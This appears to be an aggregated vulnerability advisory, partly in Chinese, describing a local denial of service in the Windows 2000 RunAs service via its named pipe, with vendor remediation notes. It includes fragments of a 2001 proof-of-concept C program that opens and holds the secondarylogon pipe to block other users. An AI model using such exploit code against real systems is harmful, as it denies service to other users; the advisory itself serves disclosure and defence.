[原文]RunAs (runas.exe) in Windows 2000 only creates one session instance at a time, which allows local users to cause a denial of service (RunAs hang) by creating a named pipe session with the authentication server without any request for service. NOTE: the vendor disputes this vulnerability, however the vendor also presents a scenario in which other users could be affected if running on a Terminal Server. Therefore this is a vulnerability.
Windows 2000的RunAs (runas.exe)每次只创建一个会议实例，本地用户可以通过创建带有无任何服务请求的认证服务器的命名管道会话导致服务拒绝（RunAs挂起）。
The fix for this vulnerability will reportedly be included in Service Pack 3. Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: email@example.com .
Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability (EDBID:21099)
The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu.
When the service is invoked, it creates a named pipe session with the specified server for authentication of credentials. The RunAs service only allows one instance of this session at a time. If a client were to create this pipe on the server without requesting any service, other clients would be unable to connect to this service.
// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.
#define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")
hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
if (hPipe == INVALID_HANDLE_VALUE)
printf("Unable to open pipe, error %d\n", GetLastError());
printf("Connected to pipe. Press any key to disconnect.\n");
Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS
Local Access Required
Denial of Service
Loss of Availability
Microsoft Windows 2000 contains a flaw that may allow a local denial of service. The issue is triggered when a RUN AS dialog is opened and never closed. The operating system can service only one such dialog at a time, preventing other users from usign the RUN AS service.
Upgrade to Service Pack version 3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.